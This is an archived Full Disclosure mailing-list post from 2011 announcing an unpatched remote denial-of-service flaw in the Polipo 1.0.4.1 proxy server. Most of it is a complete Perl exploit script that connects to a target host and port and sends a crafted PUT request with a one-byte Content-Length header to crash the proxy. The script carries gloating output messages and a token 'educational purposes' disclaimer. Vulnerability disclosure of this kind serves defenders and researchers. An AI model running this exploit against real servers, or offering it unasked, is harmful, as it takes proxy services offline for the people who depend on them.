Full Disclosure mailing list archives
Polipo 1.0.4.1 Denial of Service
From: Usman Saeed <usman () xc0re net>
Date: Sat, 01 Oct 2011 21:33:46 +0500
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service] # Date: [10/05/10] # Author: [Usman Saeed] # Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/] # Version: [1.0.4.1] # Tested on: [Windows 7 Home] # CVE : [if exists] # Code : [exploit code] Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/ [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted POST/PUT request to the server , the proxy server crashes ! [*] Exploitation : #!/usr/bin/perl # POLIPO 1.0.4.1 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [30/09/11] $host = $ARGV[0]; $PORT = $ARGV[1]; $evil = "PUT / HTTP/1.1\r\n". "Content-Length:1\r\n\r\n"; use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+\n"; print "+ Program [POLIPO 1.0.4.1 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [30/09/11] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+\n"; print "+ Program [POLIPO 1.0.4.1 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [30/09/11] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; print "\n"; print "[*] Initializing\n"; sleep(2); print "[*] Sendin evil Packet Buhahahahaha \n"; send ($sock , $evil , 0); print "[*] Crashed :) \n"; $res = recv($sock,$response,1024,0); print $response; exit; -- Usman Saeed Blog : http://www.xc0re.net/blog Twitter : http://twitter.com/xc0resecurity Facebook : https://www.facebook.com/pages/Xc0re-Security-Reseach-Group/168397916536539 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Polipo 1.0.4.1 Denial of Service Usman Saeed (Oct 01)